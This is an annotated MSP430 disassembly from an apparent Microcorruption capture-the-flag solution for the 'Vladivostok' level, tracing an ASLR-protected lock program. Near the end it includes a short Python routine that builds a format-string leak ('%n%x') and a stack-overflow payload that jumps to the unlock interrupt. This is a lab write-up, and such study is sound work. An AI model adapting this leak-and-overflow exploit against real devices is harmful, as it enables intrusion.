MicroCorruption/15-Vladivostok/Vladivostok.asm

753 lines
15 KiB
NASM

.msp430
0010 <__trap_interrupt>
0010: 3041 ret
; Only runs once
4400 <__init_stack>
4400: 3140 0044 mov #0x4400, sp
4404 <__low_level_init>
4404: 1542 5c01 mov &0x015c, r5
4408: 75f3 and.b #-0x1, r5
440a: 35d0 085a bis #0x5a08, r5
440e <__do_copy_data>
440e: 3f40 0000 clr r15
4412: 0f93 tst r15
4414: 0724 jz $+0x10 <__do_clear_bss+0x0>
4416: 8245 5c01 mov r5, &0x015c
441a: 2f83 decd r15
; 4170 contains only zeroes
441c: 9f4f 704a 0024 mov 0x4a70(r15), 0x2400(r15)
4422: f923 jnz $-0xc <__do_copy_data+0x8>
4424 <__do_clear_bss>
4424: 3f40 3200 mov #0x32, r15
4428: 0f93 tst r15
442a: 0624 jz $+0xe <main+0x0>
442c: 8245 5c01 mov r5, &0x015c
4430: 1f83 dec r15
4432: cf43 0024 mov.b #0x0, 0x2400(r15)
4436: fa23 jnz $-0xa <__do_clear_bss+0x8>
rand_base_0x038: <main>
main:
4438: b012 1c4a call #0x4a1c <rand> ; get rand_base
443c: 0b4f mov r15, r11
443e: 3bf0 fe7f and #0x7ffe, r11
4442: 3b50 0060 add #0x6000, r11
4446: b012 1c4a call #0x4a1c <rand>
444a: 0a4f mov r15, r10
; Copy 0x1000 bytes from 0x4400 to rand_base
444c: 3012 0010 push #0x1000
4450: 3012 0044 push #0x4400
4454: 0b12 push r11
4456: b012 e849 call #0x49e8 <_memcpy>
445a: 3150 0600 add #0x6, sp
445e: 0f4a mov r10, r15
4460: 3ff0 fe0f and #0xffe, r15
4464: 0e4b mov r11, r14
4466: 0e8f sub r15, r14
4468: 3e50 00ff add #0xff00, r14
446c: 0d4b mov r11, r13
446e: 3d50 5c03 add #0x35c, r13
4472: 014e mov r14, sp
4474: 0f4b mov r11, r15
4476: 8d12 call r13
rand_base_0x078: <__stop_progExec__>
4478: 32d0 f000 bis #0xf0, sr
447c: fd3f jmp $-0x4 <__stop_progExec__+0x0>
rand_base_0x07e: <__ctors_end>
447e: 3040 6e4a br #0x4a6e <_unexpected_>
rand_base_0x082: <_aslr_main>
_aslr_main: ;! args: r15
push r11
push r10
; Eight more bytes on stack
sub #0x8, sp
mov r15, r12
add #0x36a, r12
mov r12, 0x2(sp)
clr r14
__delete_code_loop:
mov.b #0x0, 0x4400(r14)
inc r14
cmp #0x1000, r14
jnz $-0xa <__delete_code_loop>
; "Username (8 char max):" -> 0x2402
mov.b #0x55, &0x2402
mov.b #0x73, &0x2403
mov.b #0x65, &0x2404
mov.b #0x72, &0x2405
mov.b #0x6e, &0x2406
mov.b #0x61, &0x2407
mov.b #0x6d, &0x2408
mov.b #0x65, &0x2409
mov.b #0x20, &0x240a
mov.b #0x28, &0x240b
mov.b #0x38, &0x240c
mov.b #0x20, &0x240d
mov.b #0x63, &0x240e
mov.b #0x68, &0x240f
mov.b #0x61, &0x2410
mov.b #0x72, &0x2411
mov.b #0x20, &0x2412
mov.b #0x6d, &0x2413
mov.b #0x61, &0x2414
mov.b #0x78, &0x2415
mov.b #0x29, &0x2416
mov.b #0x3a, &0x2417
mov.b #0x0, &0x2418
mov #0x17, &0x2400
mov #0x2402, r14
clr r11
jmp $+0x22 <print_uname_string>
; Print the uname string bytewise
__print_uname_string_l:
inc r14
sxt r13
push r11
push r13
push r11
push pc
push sr
mov r11, r15
swpb r15
mov r15, sr
bis #0x8000, sr
call #0x10
pop sr
add #0x8, sp
print_uname_string:
mov.b @r14, r13
tst.b r13
jnz $-0x24 <__print_uname_string_l>
; Print newline
__print_line_feed__1: ; putchar
clr r14
mov #0xa, r13
push r14
push r13
push r14
push pc
push sr
mov r14, r15
swpb r15
mov r15, sr
bis #0x8000, sr
call #0x10
pop sr
add #0x8, sp
;* Print ">>"
__print_less_than__1: ; putchar
add #0x34, r13
push r14
push r13
push r14
push pc
push sr
mov r14, r15
swpb r15
mov r15, sr
bis #0x8000, sr
call #0x10
pop sr
add #0x8, sp
__print_less_than__2: ; putchar
push r14
push r13
push r14
push pc
push sr
mov r14, r15
swpb r15
mov r15, sr
bis #0x8000, sr
call #0x10
pop sr
add #0x8, sp
;! Gets 8 bytes of user input -> &0x2426
__get_uname_string: ; getsn
mov #0x8, r10
mov #0x2426, r11
mov #0x2, r13
push r10
push r11
push r13
push pc
push sr
mov r13, r15
swpb r15
mov r15, sr
bis #0x8000, sr
call #0x10 ; INT (2, 0x2426, 0x8)
pop sr
add #0x8, sp
; Calls r15+0x36a
mov.b r14, &0x242e
push r11
call r12 ;! PRINTF???
incd sp
mov r11, r15
jmp $+0x8 <clsb_a>
__clsb_a_loop:
mov.b #0x0, 0x0(r15)
inc r15
clsb_a:
cmp #0x2432, r15
jnz $-0xa <__clsb_a_loop>
;! "Password:" -> 0x2403
mov.b #0xa, &0x2402 ; length 10
mov.b #0x50, &0x2403
mov.b #0x61, &0x2404
mov.b #0x73, &0x2405
mov.b #0x73, &0x2406
mov.b #0x77, &0x2407
mov.b #0x6f, &0x2408
mov.b #0x72, &0x2409
mov.b #0x64, &0x240a
mov.b #0x3a, &0x240b
mov.b #0x0, &0x240c
mov #0x2402, r14 ; r14 = &length
; puts ("Password:")
clr r12
jmp $+0x22 <print_passwd_string>
__print_passwd_string:
inc r14
sxt r13
push r12
push r13
push r12
push pc
push sr
mov r12, r15
swpb r15
mov r15, sr
bis #0x8000, sr
call #0x10 ; INT (0, r13)
pop sr
add #0x8, sp
print_passwd_string:
mov.b @r14, r13
tst.b r13
jnz $-0x24 <__print_passwd_string>
clr r14
mov #0xa, r13
push r14
push r13
push r14
push pc
push sr
mov r14, r15
swpb r15
mov r15, sr
bis #0x8000, sr
call #0x10
pop sr
add #0x8, sp
;! Get password from user -> STACK
__get_pass_string: ; getsn
mov sp, r11
add #0x4, r11
mov #0x14, r12
mov #0x2, r13
push r12
push r11
push r13
push pc
push sr
mov r13, r15
swpb r15
mov r15, sr
bis #0x8000, sr
call #0x10 ; INT (2, )
0x2aa:
pop sr
add #0x8, sp
;! Check password with HSM-2
__check_password: ; conditional_unlock_door
add #0x7c, r13
mov sp, r12
push r12
push r11
push r13
push pc
push sr
mov r13, r15
swpb r15
mov r15, sr
bis #0x8000, sr
call #0x10
pop sr
add #0x8, sp
; "Wrong!" -> 0x2402
mov.b #0x57, &0x2402
mov.b #0x72, &0x2403
mov.b #0x6f, &0x2404
mov.b #0x6e, &0x2405
mov.b #0x67, &0x2406
mov.b #0x21, &0x2407
mov.b r14, &0x2408 ; Hah, nice hint: r14 still 0
mov #0x7, &0x2400 ; length: 7
;* puts
mov #0x2402, r13
jmp $+0x22 <_aslr_main+0x2a2>
__print_wrong_string: ; puts ("Wrong!")
inc r13
sxt r12
push r14
push r12
push r14
push pc
push sr
mov r14, r15
swpb r15
mov r15, sr
bis #0x8000, sr
call #0x10
pop sr
add #0x8, sp
print_wrong_string:
mov.b @r13, r12
tst.b r12
jnz $-0x24 <_aslr_main+0x282>
; print newline
clr r14
mov #0xa, r13
push r14
push r13
push r14
push pc
push sr
mov r14, r15
swpb r15
mov r15, sr
bis #0x8000, sr
call #0x10
pop sr
add #0x8, sp
mov sp, r14
; r15 = ++r14
incd r14
push r14
pop r15
4754:
add #0x8, sp
pop r10
pop r11
ret
rand_base_0x35c: <aslr_main>
aslr_main:
475c: 0e4f mov r15, r14
475e: 3e50 8200 add #0x82, r14
4762: 8e12 call r14
; SR |= 0x00f0
4764: 32d0 f000 bis #0xf0, sr
4768: 3041 ret
aslr_base_0x36a: <printf>
printf:
; Save registers
push r11
push r10
push r9
push r8
push r7
push r6
push r4
; Create a new stack frame of 0xe bytes
mov sp, r4
add #0xe, r4
; Get the first argument
decd sp
mov 0x2(r4), r10
mov sp, -0x10(r4)
mov r10, r15
clr r14
jmp $+0x18 <__target_1> +3a
inc r15
cmp.b #0x25, r13
jnz $+0x10 <__target_1> +3a
cmp.b @r15, r13
jnz $+0x8 <__target_2> +36
__target_4:
inc r15
clr r13
jmp $+0x4 <__target_3> +38
__target_2:
mov #0x1, r13
add r13, r14
__target_3:
mov.b @r15, r13
tst.b r13
jnz $-0x1a <__target_4> +24
mov r14, r15
add r15, r15
incd r15
sub r15, sp
mov sp, r11
mov r4, r12
add #0x4, r12
mov sp, r15
clr r13
jmp $+0xc <printf+0x5e>
mov @r12, 0x0(r15)
inc r13
incd r15
incd r12
cmp r14, r13
jl $-0xc <printf+0x54>
clr r12
mov #0x9, r6
mov r12, r13
mov #0x25, r7
jmp $+0xf8 <printf+0x166>
inc r10
cmp.b #0x25, r15
jz $+0x26 <printf+0x9c>
inc r12
__target_1:
mov.b r15, r14
sxt r14
push r13
push r14
push r13
push pc
push sr
mov r13, r15
swpb r15
mov r15, sr
bis #0x8000, sr
call #0x10
pop sr
add #0x8, sp
jmp $+0xcc <printf+0x166>
mov.b @r10, r14
cmp.b r15, r14
jnz $+0x22 <printf+0xc2>
inc r12
push r13
push r7
push r13
push pc
push sr
mov r13, r15
swpb r15
mov r15, sr
bis #0x8000, sr
call #0x10
pop sr
add #0x8, sp
jmp $+0xa2 <printf+0x162>
cmp.b #0x73, r14
jnz $+0x32 <printf+0xf8>
mov @r11, r14
clr r8
jmp $+0x24 <printf+0xf0>
inc r12
inc r14
sxt r9
push r8
push r9
push r8
push pc
push sr
mov r8, r15
swpb r15
mov r15, sr
bis #0x8000, sr
call #0x10
pop sr
add #0x8, sp
mov.b @r14, r9
tst.b r9
jnz $-0x26 <printf+0xce>
jmp $+0x6c <printf+0x162>
cmp.b #0x78, r14
jnz $+0x5a <printf+0x156>
mov @r11, r14
mov #0x4, r9
jmp $+0x4a <printf+0x14c>
mov r14, r15
swpb r15
and #0xff, r15
clrc
rrc r15
rra r15
rra r15
rra r15
cmp r15, r6
jl $+0xa <printf+0x122>
mov r15, r8
add #0x30, r8
jmp $+0x8 <printf+0x128>
mov r15, r8
add #0x57, r8
push r13
push r8
push r13
push pc
push sr
mov r13, r15
swpb r15
mov r15, sr
bis #0x8000, sr
call #0x10
pop sr
add #0x8, sp
add r14, r14
add r14, r14
add r14, r14
add r14, r14
add #-0x1, r9
cmp #-0x1, r9
jnz $-0x4c <printf+0x104>
add #0x4, r12
jmp $+0xe <printf+0x162>
cmp.b #0x6e, r14
jnz $+0x8 <printf+0x162>
mov @r11, r15
mov r12, 0x0(r15)
incd r11
inc r10
mov.b @r10, r15
tst.b r15
jnz $-0xfa <printf+0x70>
mov -0x10(r4), sp
incd sp
pop r4
pop r6
pop r7
pop r8
pop r9
pop r10
pop r11
ret
;;;
def bypass (printf_loc):
aslr_base = printf_loc - 0x36a;
print(b'%n%x'.hex())
print(f"{b'AAAA1011'.hex()}{aslr_base+0x56c:x}7f7f{aslr_base+0x4f4:x}")
;;;
aslr_base_0x4ec: <_INT>
_INT:
48ec: 1e41 0200 mov 0x2(sp), r14
48f0: 0212 push sr
48f2: 0f4e mov r14, r15
aslr_base_0x4f4:
48f4: 8f10 swpb r15
48f6: 024f mov r15, sr
48f8: 32d0 0080 bis #0x8000, sr
48fc: b012 1000 call #0x10
4900: 3241 pop sr
4902: 3041 ret
aslr_base_0x504: <INT>
INT:
4904: 0c4f mov r15, r12
4906: 0d12 push r13
4908: 0e12 push r14
490a: 0c12 push r12
490c: 0012 push pc
490e: 0212 push sr
4910: 0f4c mov r12, r15
4912: 8f10 swpb r15
4914: 024f mov r15, sr
4916: 32d0 0080 bis #0x8000, sr
491a: b012 1000 call #0x10
491e: 3241 pop sr
4920: 3152 add #0x8, sp
4922: 3041 ret
aslr_base_0x524: <putchar>
putchar:
4924: 0e4f mov r15, r14
4926: 0d43 clr r13
4928: 0d12 push r13
492a: 0e12 push r14
492c: 0d12 push r13
492e: 0012 push pc
4930: 0212 push sr
4932: 0f4d mov r13, r15
4934: 8f10 swpb r15
4936: 024f mov r15, sr
4938: 32d0 0080 bis #0x8000, sr
493c: b012 1000 call #0x10
4940: 3241 pop sr
4942: 3152 add #0x8, sp
4944: 0f4e mov r14, r15
4946: 3041 ret
aslr_base_0x548: <getchar>
getchar:
4948: 2183 decd sp
494a: 0d43 clr r13
494c: 1e43 mov #0x1, r14
494e: 0c41 mov sp, r12
4950: 0d12 push r13
4952: 0c12 push r12
4954: 0e12 push r14
4956: 0012 push pc
4958: 0212 push sr
495a: 0f4e mov r14, r15
495c: 8f10 swpb r15
495e: 024f mov r15, sr
4960: 32d0 0080 bis #0x8000, sr
4964: b012 1000 call #0x10
4968: 3241 pop sr
496a: 3152 add #0x8, sp
496c: 6f41 mov.b @sp, r15
496e: 8f11 sxt r15
4970: 2153 incd sp
4972: 3041 ret
aslr_base_0x574: <getsn>
getsn:
4974: 0d4f mov r15, r13
4976: 2c43 mov #0x2, r12
4978: 0e12 push r14
497a: 0d12 push r13
497c: 0c12 push r12
497e: 0012 push pc
4980: 0212 push sr
4982: 0f4c mov r12, r15
4984: 8f10 swpb r15
4986: 024f mov r15, sr
4988: 32d0 0080 bis #0x8000, sr
498c: b012 1000 call #0x10
4990: 3241 pop sr
4992: 3152 add #0x8, sp
4994: 3041 ret
aslr_base_0x596: <puts>
puts:
4996: 0e4f mov r15, r14
4998: 0c43 clr r12
499a: 103c jmp $+0x22 <puts+0x26>
499c: 1e53 inc r14
499e: 8d11 sxt r13
49a0: 0c12 push r12
49a2: 0d12 push r13
49a4: 0c12 push r12
49a6: 0012 push pc
49a8: 0212 push sr
49aa: 0f4c mov r12, r15
49ac: 8f10 swpb r15
49ae: 024f mov r15, sr
49b0: 32d0 0080 bis #0x8000, sr
49b4: b012 1000 call #0x10
49b8: 3241 pop sr
49ba: 3152 add #0x8, sp
49bc: 6d4e mov.b @r14, r13
49be: 4d93 tst.b r13
49c0: ed23 jnz $-0x24 <puts+0x6>
49c2: 0e43 clr r14
49c4: 3d40 0a00 mov #0xa, r13
49c8: 0e12 push r14
49ca: 0d12 push r13
49cc: 0e12 push r14
49ce: 0012 push pc
49d0: 0212 push sr
49d2: 0f4e mov r14, r15
49d4: 8f10 swpb r15
49d6: 024f mov r15, sr
49d8: 32d0 0080 bis #0x8000, sr
49dc: b012 1000 call #0x10
49e0: 3241 pop sr
49e2: 3152 add #0x8, sp
49e4: 0f4e mov r14, r15
49e6: 3041 ret
aslr_base_0x5e8: <_memcpy>
memcpy:
49e8: 1c41 0600 mov 0x6(sp), r12
49ec: 0f43 clr r15
49ee: 093c jmp $+0x14 <_memcpy+0x1a>
49f0: 1e41 0200 mov 0x2(sp), r14
49f4: 0e5f add r15, r14
49f6: 1d41 0400 mov 0x4(sp), r13
49fa: 0d5f add r15, r13
49fc: ee4d 0000 mov.b @r13, 0x0(r14)
4a00: 1f53 inc r15
4a02: 0f9c cmp r12, r15
4a04: f523 jnz $-0x14 <_memcpy+0x8>
4a06: 3041 ret
aslr_base_608: <_bzero>
bzero:
4a08: 0d43 clr r13
4a0a: 053c jmp $+0xc <_bzero+0xe>
4a0c: 0c4f mov r15, r12
4a0e: 0c5d add r13, r12
4a10: cc43 0000 mov.b #0x0, 0x0(r12)
4a14: 1d53 inc r13
4a16: 0d9e cmp r14, r13
4a18: f923 jnz $-0xc <_bzero+0x4>
4a1a: 3041 ret
aslr_base_0x61c: <rand>
rand:
4a1c: 0e43 clr r14
4a1e: 3d40 2000 mov #0x20, r13
4a22: 0e12 push r14
4a24: 0e12 push r14
4a26: 0d12 push r13
4a28: 0012 push pc
4a2a: 0212 push sr
4a2c: 0f4d mov r13, r15
4a2e: 8f10 swpb r15
4a30: 024f mov r15, sr
4a32: 32d0 0080 bis #0x8000, sr
4a36: b012 1000 call #0x10
4a3a: 3241 pop sr
4a3c: 3152 add #0x8, sp
4a3e: 0f4f mov r15, r15
4a40: 3041 ret
aslr_base_0x642: <conditional_unlock_door>
conditional_unlock_door:
4a42: 2183 decd sp
4a44: 0e4f mov r15, r14
4a46: 3d40 7e00 mov #0x7e, r13
4a4a: 0c41 mov sp, r12
4a4c: 0c12 push r12
4a4e: 0e12 push r14
4a50: 0d12 push r13
4a52: 0012 push pc
4a54: 0212 push sr
4a56: 0f4d mov r13, r15
4a58: 8f10 swpb r15
4a5a: 024f mov r15, sr
4a5c: 32d0 0080 bis #0x8000, sr
4a60: b012 1000 call #0x10
4a64: 3241 pop sr
4a66: 3152 add #0x8, sp
4a68: 0f43 clr r15
4a6a: 2153 incd sp
4a6c: 3041 ret
4a6e <_unexpected_>
4a6e: 0013 reti pc